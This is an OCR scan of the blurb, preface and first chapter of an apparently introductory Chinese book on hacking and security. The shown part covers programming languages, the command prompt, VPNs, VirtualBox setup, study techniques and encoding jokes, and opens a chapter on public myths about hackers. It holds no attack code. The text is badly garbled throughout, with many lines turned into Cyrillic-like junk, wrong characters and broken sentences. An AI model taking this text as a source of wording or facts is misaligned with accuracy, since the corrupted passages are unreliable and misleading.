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内 容 简 介 

这 是 一 本 专门 介绍 并 分 享 黑客 与 安全 技术 的 入 门 书 ， 内 容 从 基础 知识 出 发 ， 通 过 相关 实例 为 读者 剖 
析 计 算 机 安全 领域 的 各 种 技巧 。 

全 书 由 10 章 组 成 ， 第 1 章 主要 介绍 了 一 些 经 典 、 高 效 的 学 习 方 法 与 基本 技能 ;第 2 章 浅 析 了 当今 相 
天 技术 的 现状 与 基本 概念 ， 第 3 章 讲 解 通过 Web 渗透 测试 来 模拟 恶意 黑客 的 攻击 行为 ， 借 此 讲解 评估 计 
算 机 网 络 系统 的 安全 性 的 方法 ; 第 4 章 讲解 比 一 般 的 黑 盒 渗 透 测 试 更 直观 、 全 面 的 代码 审计 的 方法 与 相 
关 知 识 ; 第 5 章 从 基础 原理 开始 ， 详 细 介绍 了 无 线 安全 的 各 种 应 用 ; 第 6 章 从 HTML 基础 开始 ， 详 细 分 
析 了 XSS 等 前 端 漏洞 的 成 因 、 和 危害 以 及 防御 措施 ;第 7 章 深入 浅 出 地 探讨 了 社会 工程 学 这 条 黑客 与 安全 
Pe rh i “ЖЕ”; 第 8 章 通 过 对 多 种 相关 调试 工具 的 使 用 和 实例 分 析 ， 讲 解 逆 问 技术 与 软件 安全 的 相 
关 知 识 ; 第 9 章 通过 对 各 种 病毒 的 调试 分 析 ， 帮 助 读者 了 解 并 掌握 病毒 攻防 技术 及 相关 知识 ; 第 10 章 介 
绍 了 安全 领域 的 一 项 竞赛 一 一 CTF。 本 书 各 章 都 有 相应 的 练习 环节 ， 读 者 可 以 亲 目 动手 ， 以 便 更 好 地 理 
解 相 关 知 识 及 掌握 相关 技能 。 

本 书 适用 于 想 了 解 黑客 与 安全 技术 的 开发 人 员 、 运 维 人 员 以 及 对 相关 技术 感 兴趣 的 读者 。 
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由 于 科技 不 断 发 展 ， 科 技 黑箱 〈 一 种 特殊 的 存储 、 传 播 和 交流 知识 的 设施 ) 的 出 现 也 
给 计算 机 发 展 珊 来 了 巨大 的 进步 ， 人 们 无 须 掌 握 全 部 知识 ， 只 须 按 照 步骤 去 学 习 和 操作 ， 
便 可 得 到 预期 的 结果 一 一 即便 你 并 不 知道 其 中 的 原理 是 什么 。 这 在 黑客 与 安全 方面 的 体现 
主要 有 两 点 ， 正 对 应 着 科技 黑箱 这 把 锋利 无 比 的 双 刃 剑 的 两 面 : 一 是 安全 技术 进步 迅速 ; 
二 是 恶意 黑客 攻击 变 得 更 加 频繁 。 

本 书面 癌 对 黑客 与 安全 体系 没有 全 面 了 解 的 开发 人 员 、 运 维 人 员 、 计 算 机 相关 专业 在 
校 学 生 ， 以 及 所 有 对 黑客 与 安全 技术 感 兴 趣 的 读者 。 安 全 事件 发 生 在 转瞬 之 间 ， 可 能 与 每 
个 人 奶奶 相关 。 如 果 人 们 没有 安全 意识 ， 或 是 对 恶意 黑客 攻击 一 无 所 知 ， 那 么 面 对 攻 击 ， 
只 剩 下 不 知 所 指 。 古 人 云 : 宜 未 雨 而 绸 纱 ， 考 临 淘 而 据 井 。 我 们 何不 通过 研究 黑客 攻击 的 
手段 寻找 防御 的 方法 呢 ? 

本 书 的 重点 内 容 ， 在 于 读者 将 在 书 中 看 到 各 种 各 样 的 攻击 手段 和 防御 措施 ， 编 者 尽 可 
能 地 将 理论 和 实践 联系 起 来 ， 以 便于 各 位 理解 。 

由 于 成 书 时 间 正 值 编 者 高 三 复习 ， 受 限于 阅历 和 精力 ， 所 以 书 中 难免 出 现 不 严谨 之 
处 ， 还 请 读者 不 音 指正 ， 编 者 也 会 第 一 时 间 在 https:/ mapers.net/ 上 进行 勘误 。 

同时 也 欢迎 读者 来 我 们 的 网 站 提问 交流 ， 我 们 将 不 断 更 新 原创 文章 ， 与 你 一 起 讨论 安 
全 热点 。 


Ш Bi ДА 


“ВЕЛ НА, ААК”. Ж, ЕҢ, KAME, НИЖНИЕ, ЖМ 
Яна). НІН, ЕНЕ А Ва та СА ВО. 

这 份 神秘 的 气 县 ， 大 概 如 同 多 数 人 对 于 黑客 的 认识 一 一 暗淡 的 灯光 下 ， 一 个 背影 ， 
RRK, ПЖ ЕРЕН ЙЕЛІ, МАН ТЫНАН АҒ АЙЫ S, АНАНЫ ЛА 
Ин, ТЕМЕН ЕВ НО ЕЕ ИОА. 

但 实际 上 上， 黑客 真 的 如 同 电影 中 描绘 的 与 人 们 想象 中 的 那样 吗 ? 

这 里 我 要 给 出 否定 的 答案 。 黑 客 无 处 不 在 ， 黑 客 之 所 以 如 此 神秘 ， 最 大 的 原因 是 人 们 
给 “黑客 ”这 个 词语 ， 以 及 一 切 与 黑客 相关 的 事物 ， 蒙 上 了 一 层 神秘 的 面纱 。 

那么 ， 到 底 什 么 才 是 黑客 ? 

“黑客 ”这 个 词 ， 其 实 最 初 曾 指 热衷 于 计算 机 技术 、 水 平 高 超 的 计算 机 专家 ， 尤 其 
是 程序 设计 人 员 。 现 在 ， 黑 客 们 活跃 在 安全 领域 的 一 线 ， 依 靠 看 敏锐 的 感知 ， 发 掘 、 研 究 
并 修复 各 种 漏洞 。 甚 至 可 以 这 样 说 : 没有 黑客 ， 计 算 机 安全 将 无 法 进步 。 黑 客 其 实 并 不 神 
秘 ， 也 并 不 可 怕 。 你 想 了 解 黑 客 吗 ? 想 通 过 学 习 黑 客 与 安全 知识 ， 去 化 解 来 自 计 算 机 的 恶 
意 攻击 吗 ? 那么 ， 本 书 值 得 一 读 。 在 这 条 路 上 你 也 许 会 遇 到 很 多 在 电影 中 才 遇 到 过 的 场景 
和 人 人物， 可 无 论 走 得 多 远 ， 也 请 务必 记 住 : 心 存 敬 上 其 ， 英 生 政 念 。5 引 用 谷歌 公司 一 句 不 成 
ХИН ле: Поп Ве Evil. 

黑客 与 安全 的 世界 广阔 无 边 ， 本 书 涵 瘟 的 内 容 只 是 沧海 一 票 ， 我 们 试图 用 最 典型 的 技 
本 和 最 精炼 的 语言 ， 回 读者 朋友 们 呈现 一 个 精彩 的 、 属 于 黑客 的 神秘 技术 世界 。 

我 们 不 会 把 “以 提高 计算 机 领域 安全 水 平 为 目标 ”这 样 空洞 的 口号 挂 在 嘴 边 ， 学 习 
也 并 不 是 徘 嘴 说 说 就 行 。 我 们 要 做 的 ， 就 是 影响 正在 认真 阅读 本 书 的 读者 ， 传 达 正 确 的 观 
念 、 知 识 以 及 学 习 方法 ， 让 读者 更 深刻 地 了 解 黑客 ， 学 习 安 全 技术 ， 通 过 钻研 黑客 与 安全 
技术 ， 从 而 在 计算 机 世界 中 更 好 地 保护 目 己 。 

本 书 共 10 章 ， 各 个 章节 独立 却 又 相互 关联 ， 知 识 点 之 间 也 有 相互 影响 的 地 方 ， 虽 然 每 
章 之 间 的 关联 性 不 是 那么 强 ， 不 过 在 内 容 安排 上 是 按照 由 浅 入 深 设 计 。 作 为 一 本 黑客 与 安 
全 技术 的 局 蒙 书 ， 我 们 尽量 照顾 初学 者 ， 但 仍然 有 很 多 基础 知识 需要 新 手 朋 友 们 目 己 去 钻 
ІШ, Ен, Но ІШЕ” МЕНЕ ЕНЕ ЗЕН), ME? 
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由 于 信息 技术 的 更 新 友 代 速度 十 分 怀 人 人， 时效 性 较 强 ， 所 以 我 们 拟 建 mapers.net 和 社区 
以 供 读者 朋友 们 交流 ， 斋 望 可 以 在 计算 机 安全 的 道路 上 助 读者 一 臂 之 力 。 


ш 本 书 适 合 的 人 : 


> 认真 的 人 ; 
> 愿意 花 时 间 钻 研 知 识 而 不 是 沉迷 于 游戏 的 人 ; 
> 善于 遇 到 问题 先 独立 寻找 答案 的 人 。 


ш 与 本 书 无 缘 的 人 : 


> ЖИА; 

> 布 望 速成 的 人 ; 

> 仅仅 是 觉得 黑客 很 酷 而 决定 学 习 黑 客 技术 的 人 ; 
> 抱 着 不 良 目 的 的 人 。 
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本 章 作为 全 书 第 1 章 ， 将 会 介绍 一 些 基础 知识 和 经 典 的 学 习 方 法 。 方 法 与 技能 有 无 数 
种 ,希望 读者 朋友 们 能 增强 独立 思考 能 力 ， 目 己 总 结 规律 ， 在 互联 网 上 寻找 书 中 没有 提 到 
的 知识 ， 这 样 才 能 更 好 地 向 握 知 识 技 能 。 


1.1.1 编程 基础 


编程 在 计算 机 领域 称 得 上 是 必 备 拉 能 了 ， 在 此 我 们 不 再 探讨 各 种 语言 的 优 缺 点 ， 也 不 
介绍 类 似 ““ 面 同 对 象 ” 和 “面向 过 程 ” 之 间 区 别 ” 的 问题 ， 更 不 会 空谈 编译 原理 等 问 
题 ， 这 里 将 人 简单 介绍 一 些 适 合 新 手 入 门 学 习 的 编程 语言 以 及 书 中 涉及 的 各 种 技术 所 需 的 编 


程 语言 。 
1. Python 


Python 是 一 种 解释 性 脚本 语言 ， 它 拥有 众多 的 “ 库 ”。Python 功 能 强大 而 且 简洁 ， 还 
可 以 将 其 他 语言 的 模块 轻松 联结 起 来 ， 故 又 被 称 为 “胶水 语言 ”。 由 于 Python 需要 的 代码 
量 极 少 且 易于 学 习 ， 其 程序 源 代 码 对 于 使 用 者 完全 开放 ， 在 开源 软件 工作 者 和 编程 初学 者 
中 具有 极 好 的 声誉 。 学 习 Python 对 人 们 日 后 的 网 络 编程 学 习 ， 以 及 Web 渗 透 中 部 分 工具 的 
使 用 具有 重要 意义 。 

目前 Python 主要 分 为 2.X 与 3.x 两 个 版 本 ， 两 者 在 语法 上 略 有 差异 ， 且 各 有 优 缺 点 ， 大 
家 可 以 根据 目 己 的 需求 学 习 不 同 的 版 本 。 


2 CZE 


C 语 言 是 一 种 极其 重要 和 流行 的 编程 语言 ， 具 有 极 高 的 可 移植 性 同样 的 代码 在 
Linux, Windows. Мас OS 系统 上 都 可 以 运行 ， 它 的 运行 速度 极 快 ， 可 以 充分 利用 计算 机 
的 优点 ， 表 现 出 只 有 汇编 语言 才 具 有 的 精细 控制 能 力 。 对 于 初学 者 来 说 ，C 语 言 是 最 容易 上 
手 的 一 门 “大 型 ”编程 语言 ，C 语 言 也 与 后 面 涉及 到 的 病毒 分 机 和 逆 回 技巧 有 重要 联系 。 


3. 汇编 语言 

汇编 语言 是 计算 机 的 底层 语言 ， 大 部 分 计算 机 的 汇编 语言 基于 X86 指 令 集 ， 计 算 机 可 
通过 汇编 程序 将 汇编 代码 转化 为 机 器 码 一 一 计算 机 可 以 直接 执行 的 代码 。 汇 编 可 以 使 人 们 
更 清晰 地 了 解 计 算 机 的 运行 原理 ， 同 时 也 对 在 接 下 来 的 章节 中 要 中 学 习 的 软件 漏洞 分 析 、 
道 回 分 析 以 及 病毒 机 制 的 理解 具有 重要 意义 。 


4. JavaScript 
JavaScript 是 一 种 脚本 语言 ， 在 Web 前 端 中 担任 看 重要 的 角色 ， 但 它 也 是 造成 XSS (9 
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站 脚本 攻击 ) 、CSRE 等 漏洞 的 菲 魁 祸首 之 一 ， 所 以 说 JavaScript 是 学 习 渗 透 测 试 和 前 疹 安 
全 的 一 门 必修 谍 。 


112 命令 提示 符 


命令 提示 符 在 许多 人 印象 里 就 是 一 个 “黑洞 洞 的 窗口 ” (其实 cmd 窗 口 也 是 可 以 美化 
的 ， 例 如 图 1-1 被 笔者 设置 成 透明 色 ， 毕 竞 如 果 长 时 间 使 用 终端 工作 ， 一 个 赏心悦目 的 界 
面 还 是 很 有 必要 的 ) 。 在 Windows 系 统 中 ， 按 Win 十 R 键 ， 输 入 cmd 并 回 车 ， 就 可 以 调 出 
cmd 窗 口 。 


图 1-1 笔者 的 cmd 命 令 提示 符 界面 

许多 应 用 在 命令 提示 符 窗 口 进 行 操作 会 更 加 人 简洁， 比如 输入 Python 可 以 局 动 Python 解 
释 器 《前 提 是 已 搭建 了 Python 环境 ) ， 学 会 命令 提示 符 的 常用 用 法 和 语法 后 ， 可 以 写 出 批 
处 理 〈*.bat) 文件 ， 来 进行 许多 原始 而 又 简单 的 操作 。 

类 似 地 ，Linux 系 统 的 Shel 则 是 Linux 的 命令 提示 符 ， 称 为 命令 行 ， 一 般 以 终端 方式 打 
开 。 俗 话说 尺 有 所 短 ， 寸 有 所 长 ，Linux 的 图 形 化 界面 虽然 没有 Windows 易 用 ， 但 是 它 在 
命令 行 方面 比 Windows 更 加 成 熟 ， 读 者 可 以 尝试 Linux 的 一 些 发 行 版 ， 例 如 Ubuntu、Debian 
和 等， 熟悉 Linux 系 统 对 于 提升 工作 效率 是 大 有 神 益 的 。 


113 虚拟 专用 网 络 


虚拟 专用 网 络 ， 这 个 名 词 可 能 令 部 分 谈 者 感到 些许 陌生 ， 但 它 的 英文 名 称 读者 一 定 听 
X$, Virtual Private Network， 即 VPN。VPN 能 够 让 其 他 人 连接 到 企业 网 络 或 内 部 网 络 ， 通 
过 一 个 公用 网 络 建立 一 个 临时 的 、 安 全 的 连接 ， 这 是 一 条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 
定 的 隧道 。 同 时 VPN 能 提供 高 水 平 的 安全 性 ， 使 用 高 级 的 加 密 和 身份 识别 协议 保护 数据 ， 
阻止 没有 被 授权 的 用 户 接 触 数 据 。 而 在 渗透 测试 中 ， 使 用 VPN 则 可 以 进入 一 些 无 法 正常 访 
问 的 网 络 环 境 ， 从 而 进一步 开展 渗透 测试 。 


1.1.4 虚拟 机 


虚拟 机 (Virtual Machine) 指 通过 软件 模拟 具有 完整 便 件 系统 功能 的 、 运 行 在 一 个 完 
全 隔离 环境 中 的 完整 计算 机 系统 。 


方法 态度 经 验 总 结 / fr ГС 
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简单 来 说 ， 虚 拟 机 就 是 操作 系统 中 的 一 个 沙 盒 ， 在 沙 盒 之 中 执行 操作 的 时 候 主 系统 是 
不 会 干扰 到 外 部 系统 的 ， 可 以 说 是 安全 测试 中 必 不 可 少 的 工具 。 

从 20 世 纪 五 六 十 年 代 IBM 提 出 虚拟 机 技术 开始 ， 虚 拟 机 技术 随 看 互联 网 的 发 展 ， Н 
益 成 熟 。 目 前 ， 比 较 流 行 的 虚拟 机 软件 有 VMware、VirtualBox 和 Virtual PC， 它 们 都 能 在 
Windows 系 统 中 虚拟 出 多 个 计算 机 系统 。 当 需要 在 其 他 系统 环境 测试 软件 或 以 另 一 个 系统 
作 辑 机 来 测试 茶 漏洞 时 ， 则 可 以 在 目 己 的 同一 台 计 算 机 上 安装 两 个 或 多 个 操作 系统 ， 例 如 
可 以 同时 安装 Linux 与 Windows 操 作 系 统 ， 并 且 在 虚拟 机 与 物理 机 之 间 共 享 文件 、 应 用 程 
序 及 网 络 资源 等 ， 这 将 极 大 地 提高 工作 效率 。 

接 下 来 ， 我 们 以 VirtualBox 软 件 为 例 来 介绍 一 下 虚拟 机 的 安装 方法 。 

VirtualBox 是 一 和 葡 利 用 的 开源 的 虚拟 机 软件 ， 它 具有 操作 简便 、 界 面 简 洁 等 很 多 优 
点 。 图 1-2 是 在 Windows 环境 下 运行 VirtualBox 的 界面 。 


% Oracle ММ VirtualBox 管理 器 = ча 
вер тым) ВИН) 
ра? D д 
ИЕ) Ш) РЕ) 清除 
”| 欢迎 使 用 虚拟 电脑 控制 台 ! 
窗口 的 记过 用 来 显示 已 生成 的 虚拟 电脑 ， 现 在 是 空 的 ， 因为 未 了 没有 新 逮 任 何 庶 拟 电脑 . 
要 新 建 一 个 虚拟 电脑 ， 请 按 位 于 窗口 顶部 工具 栏 上 的 ЖЖ ЗЫ. 2 q 


你 可 以 扩 Fl ЖЕНЕВА), ПИШ vwe. box. org 查看 最 ” "р 
Зп Япет] 


国 СЕНЕ) 


ч 


е”, 


в. 


1-2 МпиаВох ят 
单 击 “新 建 ” 按 钮 ， 会 弹出 如 图 1-3 所 示 的 界面 ， 这 里 需要 键入 虚拟 机 的 名 称 以 及 选 
择 所 安装 系统 的 类 型 和 版 本 。 
之 后 ， 单 击 “ 下 一 步 ” 按 钮 进入 内 存 分 配 界面 ， 如 图 1-4 所 示 。 在 安装 每 一 个 虚拟 系 
统 的 时 候 ， 都 要 为 其 分 配 相 应 大 小 的 内 存 ， 这 些 内 存 用 以 文 持 虚拟 系统 的 运行 及 虚拟 系统 


中 程序 的 运行 。 
? ? 
е) ”新 建 虚拟 电脑 (©) ее 
虚拟 电脑 名 称 和 系统 类 型 内 存 大 小 
请 选择 新 虚拟 电脑 的 指 述 名 称 及 要 安装 的 操作 系统 类 型。 选择 分 配给 虚拟 电脑 的 内 存 大 小 0B) о 


此 名 称 将 用 十 标识 此 虚拟 电脑 


жапа): 建议 的 内 存 大 小 为 192 мв 
а“ 


U 256 [H| ив 
ЖЕЦТ): Microsoft Vindows -| EJ LOT Т 
ВИ (ү): Windows ХР (32 bit) ЕЯ 4 в 4096 ИВ 
тво 
图 1-3 ”为 虚拟 机 命名 并 选择 镜像 的 系统 类 型 与 版 本 图 1-4 为 虚拟 机 分 配 内 存 


虚拟 机 系统 为 Windows XP 时 ， 为 其 分 配 256M 的 运行 内 存 足 够 支持 虚拟 机 中 的 常用 操 
作 。 当 然 ， 所 能 分 配 的 最 大 内 存 不 能 超过 物理 机 内 存 的 剩余 部 分 ， 毕 竞 虚 拟 机 内 存 是 无 法 
凭空 虚拟 的 。 


除了 分 配 内 存 ， 还 要 给 虚拟 系统 分 配 人 硬盘。 硬盘 是 一 个 载体 ， 如 同 主 系统 安装 在 主机 
的 硬盘 上 一 样 ， 我 们 要 给 所 安装 的 虚拟 系统 分 配 一 块 虚拟 人 硬盘。 分 配 硬 盘 有 两 种 方式 ， 
种 是 固定 大 小 ， 另 一 种 是 动态 分 配 ， 如 图 1-5 所 示 。 

顾名思义 ， 动 态 分 布 模式 下 ， 给 虚拟 系统 分 配 的 人 硬盘 空间 会 随 看 虚拟 系统 的 增 大 而 增 
大 ， 在 该 模式 下 ， 新 建 硬盘 很 快 ， 而 且 不 需要 消耗 太 大 空间 ， 分 配给 虚拟 系统 的 硬盘 大 小 
会 随 看 逐渐 使 用 而 增加 。 

而 固定 大 小 模式 ， 则 是 为 虚拟 系统 分 配 固定 的 空间 ， 在 空间 足够 时 ， 虚 拟 系统 可 以 流 
畅 地 运行 ， 如 果 虚 拟 系统 所 占 的 空间 大 于 或 等 于 所 分 配 的 硬盘 内 存 ， 则 会 出 现 错误 。 如 图 
1-6 所 示 ，VirtualBox 软 件 会 根据 所 选择 的 系统 类 型 默认 一 个 人 硬盘 大 小 ， 可 供 参 考 。 


? ЕШ ? > 
(=) ввеква (=) ввеква 
存储 在 物理 硬盘 上 文 忻 习 置 和 大 小 
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图 1-5 为 虚拟 机 设置 虚拟 硬盘 类 型 图 1-6 为 虚拟 硬盘 命名 并 分 配 大 小 


单 击 “ 创 建 ” 按 钮 ， 我 们 可 以 看 到 创建 过 程 ， 如 图 1-7 所 示 。 


$ 创建 虚拟 硬盘 : Creating fixed medium storage unit 'C:\Users\yy\VirtualB... 


Creating fixed medium storage unit "С: \Wsers\yy\VirtualBox VMs\xp\xp. 41°... 


== 14% X 
剩余 时 间 : 17 #0 


图 1-7 创建 虚拟 硬盘 
全 此 ， 我 们 的 虚拟 硬盘 就 建立 完毕 了 。 之 后 在 VirtualBox 的 主 界面 可 以 看 到 左 侧 的 管 
理 列表 出 现 了 刚刚 创建 的 虚拟 系统 。 单 击 选 中 左 侧 的 系统 ， 单 击 局 动 栏 上 的 “启动 ” 按 
钮 ， 便 可 以 进入 创建 的 虚拟 系统 中 ， 如 图 1-8 所 示 。 
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图 1-8 ”开启 虚拟 机 
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在 刚才 的 操作 之 中 ， 我 们 在 VirtualBox 中 创建 了 一 个 “空位 ”， 接 下 来 就 可 以 通过 镜 
像 文 件 来 安装 系统 了 人 ， 相 信 读 者 都 熟知 ， 这 里 不 再 次 述 。 
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在 简单 熟悉 了 一 些 基 本 知识 后 ， 让 我 们 来 看 一 些 在 计算 机 领域 十 分 实用 的 学 习 方 法 。 
局 效 的 学 习 方 法 可 以 帮助 我 们 节省 时 间 和 精力 ， 有 的 思维 方式 其 至 能 帮助 我 们 突破 思 
维 柳 锁 ， 所 以 ， 学 习 一 些 学 习 方法 是 十 分 必要 的 。 


1.2.1 思维 导 图 


思维 导 图 (Mind Manager) ， 又 称心 智 图 ， 是 一 种 表达 发 散 性 思维 的 有 效 的 图 形 思 维 
工具 。 它 的 创始 人 东 尼 。，。 博 赞 (Tony Buzan) 拥有 “全 世界 最 高 创造 力 IQ” 的 头衔 。 思 维 
导 图 有 利于 人 脑 的 扩散 思维 的 展开 ， 有 影响 力 极 大 ， 新 加 坡 甚至 将 思维 导 图 列 为 小 学 必修 科 
目 ， 大 量 著 名 大 型 企业 也 逐渐 开始 使 用 思维 导 图 。 

思维 导 图 所 运用 的 方法 是 一 种 将 发 散 性 思维 具体 化 的 方法 ， 它 提供 一 个 关键 点 ， 即 父 
节点 ， 然 后 发 散 出 任意 多 个 子 节点 ， 这 些 节点 又 可 以 与 其 他 节点 相连 ， 形 成 可 视 化 记忆 结 
构 ， 在 管理 大 型 项 目 或 渗透 测试 等 需要 全 局 掌控 的 环境 下 非常 实用 。 图 1-9 是 一 个 项 目 计 
划 的 思维 导 图 雏形 。 


7 
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图 1-9 ”一 个 项 目 计划 的 思维 导 图 雏形 
绘制 思维 导 图 的 软件 有 很 多 ， 各 种 平台 均 有 丰富 的 软件 可 供 选 择 ， 当 然 ， 在 白板 或 车 
稿 纸 上 也 可 以 很 好 地 展现 思维 导 图 。 
1.2.2 2В582255 


所 谓 曼 陀 罗 思考 法 ， 与 上 文 的 思维 导 图 一 样 ， 是 一 种 能 够 开发 创意 、 发 现 问题 、 提 高 
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效率 的 思维 方式 ， 它 主要 应 用 于 制作 备 坏 录 与 理 清 思路 。 
一 般 的 曼 陀 罗 思 考 法 笔记 分 为 9 个 区 域 ， 它 的 特点 是 让 
人 依托 惯性 思维 和 下 线 思维 ， 在 曼 陀 罗 笔 记 的 视觉 影响 下 ， 
人 们 会 从 各 个 方面 对 主题 进行 思考 ， 此 时 潜意识 会 被 激发 ， 
灵感 会 比 平时 更 容易 被 大 脑 捕捉 。 图 1-10 为 一 个 简单 的 曼 陀 
罗 笔 记 格式 ， 相 信和 你 看 一 过 就 能 在 纸 上 还 原 它 了 。 
вен “илл” м “5” р 
使 用 方法 ， 它 们 都 是 从 最 中 间 的 一 点 开始 ， 思 考 “5W” 1-10 一 个 简单 的 曼 陀 罗 笔 记 
(Who、What、Why、Where 和 When) ， 这 在 逻辑 编程 和 信息 搜集 中 有 奇效 。 


123 番茄 工作 法 


ли ГЕТЕ (The Pomodoro Technique) ， 是 一 种 时 间 管 理 方法 ， 由 弗朗西斯 科 。 西 
里 洛 (Francesco Cirillo) 于 1992 年 创立 ， 这 种 方法 的 规则 大 致 如 下 。 

(1) 记录 要 完成 的 任务 ， 写 在 纸 上 或 记录 在 你 的 电子 设备 中 。 

(2) 每 4 个 番茄 钟 为 一 组 ， 每 组 30 分 钟 ，30 分 钟 内 专注 于 一 项 工作 ， 不 允许 做 任何 无 
关 的 事 并 目 行 安排 最 后 几 分 钟 休息 ， 每 4 个 番茄 钟 安排 15$ 一 30 分 钟 体 悬 时间。 

(3) 番茄 钟 不 可 以 分 割 。 

(4) 在 该 番茄 钟 完 成 时 ， 画 一 个 X， 大 由 于 不 可 抗力 或 人 为 因素 放弃 了 该 番 驰 钟 
(哪怕 还 剩 1 分 钟 就 结束 了 )〉， 都 不 能 男 X， 这 个 番 训 钟 应 该 算 没 有 存在 过 。 

(5) ЖАНЕ ЗЕН ЖЕ. 

(6) 根据 目 身 调整 方法 。 

利用 这 种 高 专注 的 工作 学习) 方法 ， 我 们 不 必 再 为 时 间 担 心 ，“ 几 小 时 一 晃 而 过 却 
什么 也 没 干 ”的 情况 不 会 再 出 现 ， 长 期 坚持 还 能 大 幅度 地 提高 集中 力 和 注意 力 ， 增 强 决策 
意识 、 大 局 观 与 决断 力 。 另 外 ， 当 一 个 个 番茄 钟 被 完成 时 ， 你 会 发 现 有 一 种 独特 的 目 紧 感 。 

管理 番茄 钟 的 软件 在 网 络 上 有 各 种 各 样 ， 也 几乎 全 平台 支持， 读者 可 以 根据 目 己 的 需 
求 ， 选 择 适 合 目 己 的 番茄 钟 管 理 软件 ， 如 果 你 有 兴趣 ， 不 妨 尝试 一 下 用 目 己 拿手 的 编程 语 


言 写 一 个 番茄 钟 软件 。 
1.3 关于 “р” 


本 节 介 绍 一 些 “ 看 似 奇 怪 ” 的 小 知识 ， 可 能 谈 者 有 所 耳闻 ， 一 起 来 看 看 这 些 开 玩 突 的 
话 中 都 旨 藏 痢 哪些 计算 机 技术 。 


1. PHP 是 最 好 的 语言 


“PHP 是 最 好 的 语言 ”这 个 梗 ， 出 自 PHP 语 言 的 函数 名 ， 虽 然 现 在 使 用 PHP 做 开发 的 


ш 0 
第 1 章 Бен istana V а 


“дүү 黑客 与 安全 技术 指南 


人 较 多 ， 用 PHP 语 言 开 发 的 网 站 也 数不胜数 ， 但 从 本 质 上 来 看 ，PHP 在 有 些 方面 十 分 令 人 
费解 ， 比 如 PHP 的 核心 函数 命名 规则 很 不 一 致 ， 有 “strptitme” 这 样 的 类 С 函数 的 名 字 ， 
A “xml set ежегпа| епшу гей handler” 这 样 十 分 长 却 规范 的 命名 ， 还 有 “nl2br” 这 样 的 
简写 方式 命名 ， 也 有 “stripcslashes” 这 样 奇 怪 的 长 名 。 后 来 有 人 发 现 ， 当 РНР 还 是 只 有 
不 到 100 个 函数 的 小 型 语言 的 时 候 ， 其 作者 决定 用 函数 名 的 字符 数量 来 作为 函数 的 hash, 
由 于 这 个 “神奇 ”的 决定 ，PHP НА АКА ИА n] Bë КНК. 95] РЯ, ХРТ 


也 一 直 持续 至 今 。 
2 “HJH” “%%%” “HHH” 5 ЕЕ” 
先 来 看 一 自 小 证: 
УЛ, 
D P k "$ Я 0 Я. 
рз Ф, фф, 
笑 看 万 物 错 错 错 。 


这 首 诗 可 能 怪异 、 令 人 费解 ， 从 技术 层面 讲 ， 它 的 含义 如 下 。 

ЕЛ: 这 是 一 个 GBK 字 符 集 和 Unicode 字 符 集 之 间 的 转换 问题 ， 有 一 些 字 
符 用 Unicode 无 法 表示 ，Unicode 就 会 用 一 个 占 位 符 来 表示 这 些 文字 ， 即 “U+FFFD 
REPLACEMENT CHARACTER”。 那 么 U+FFFD 用 UTF-8 编 码 出 来 ， 多 次 重复 ， 然 后 放 
到 GBK 等 环境 中 显示 的 话 ， 一 个 汉字 2 个 字 节 ， 最 终 的 结果 就 是 : М COxEFBF) , JT 
(OxBDEF) , 3% (0xBFBD) 。 

锟 斤 拷 也 曾 出 现在 新 闻 中 : 


神舟 十 号 11 日 17 时 38 分 发 射 ， 三 位 航天 员 公 布 链 接 指向 神奇 的 “ 锟 斤 找 锟 斤 找 锟 2 ， 
85157, ЖЯ ЕФ. 


ARA” “іші” 5 И”: ОЕ ТН БҮ, ЖаН И 
в, Уа YES 4 /УАЛ.Е0, ЖЛ ИЗЭИЛЛТЕШ ИТ, Жанет е KEE, MAFRA 
员 申 请 的 内 存 后 面 经 常 被 填充 为 “CCCCCCC…”， 这 样 输出 结果 就 成 了 著名 的 “ 溪 
а” А 
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本 章 主 要 介绍 了 一 些 编程 语言 、 虚 拟 机 的 安装 及 一 些 学 习 方式 等 ， 作 为 网 络 安全 技术 
的 基础 ， 这 里 有 必要 做 简单 介绍 。 相 信 通 过 后 面 章 节 的 学 习 ， 读 者 会 对 各 个 方向 有 更 清晰 
的 认 知 。 
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正如 前 言 所 说 ， 很 多 人 认为 “黑客 ”这 个 词 具有 贬义 ， 实 际 上 黑客 却 在 推动 计算 机 不 
断 进 步 方面 功 不 可 没 ， 黑 客 与 安全 技术 密 不 可 分 。 如 果 好 坏 善 恶 需 要 明确 的 词语 来 划分 的 
话 ， 那 么 善意 的 黑客 我 们 称 为 白 帆 黑客 ,恶意 的 黑客 则 被 称 为 黑 帽 黑客。 俗话 说 “攻防 不 
绝对 ， 技 术 无 黑白 ”， 好 坏 要 看 使 用 者 目 喘 。 

放眼 当下 ， 大 多 数 人 对 黑客 的 认识 还 停留 在 “破坏 ”与 “入 侵 ” 等 词汇 上 ， 造 成 这 种 
现象 的 原因 ， 一 方面 ， 大 众 往往 无 法 直接 接触 黑客 群体 ， 仅 在 影视 作品 中 了 解 过 黑客 ， 殊 
不 知 ， 影 视 作 品 多 有 稚 张 成 分 。 另 一 方面 ， 新 闻 媒 体 对 黑客 的 报道 也 略 有 偶 颇 ， 例 如 近期 
新 闻 “ 中 国 年 龄 最 小 的 黑客 ，13 岁 时 ， 入 侵 学 校 的 在 线 答题 系统 ， 只 为 不 做 作业 ， 利 用 黑 
客 “ 抓 包 技术 ” 花 1 分 钱 买 了 2500 元 的 东西 ……” 实 际 上 ， 这 位 “小 黑客 ”本 人 也 表示 ， 
这 是 对 他 的 误 读 ， 新 闻 内 容 实 在 是 夺 张 至 极 ， 充 斥 看 添 油 加 酯 之 后 用 以 吸引 眼球 的 文学 。 
更 有 其 者 ， 还 出 现 过 “小 学 三 年 级 会 破解 计算 机 密码 ， 资 取信 用 卡 赚 取 15 亿 ”这 种 夸张 的 
标题 ， 实 际 情况 如 何 ， 各 位 读者 心中 ， 应 该 都 有 一 面 明镜 。 
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АСЕМ МБХ, 162 АЛЕ I Кан. НОЖ, 
这 时 就 出 现 了 一 些 不 怀 好 总 的 人 ， 利 用 各 种 各 样 的 手段 “伤害 ”读者 ， 我 们 现在 就 来 剖析 
一 下 这 些 和 常见 的 现象 。 
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ЕЕ ЛУ Y WW ЖЕНЕ» АПУ ЛТ СТАТЕЙ, ХШ, МИҒА Ай ВНЕ, 
Ж АЕ ЕНТ, НИМ, ИНА Дата 18], WA 
(НЕ, ЖЕЖ “ей”, AITASE. (НЕН РАХИ ИЧЕ, За ИЕНІ 
罚 ， 这 更 加 助长 了 他 们 的 嚣张 气焰 。 

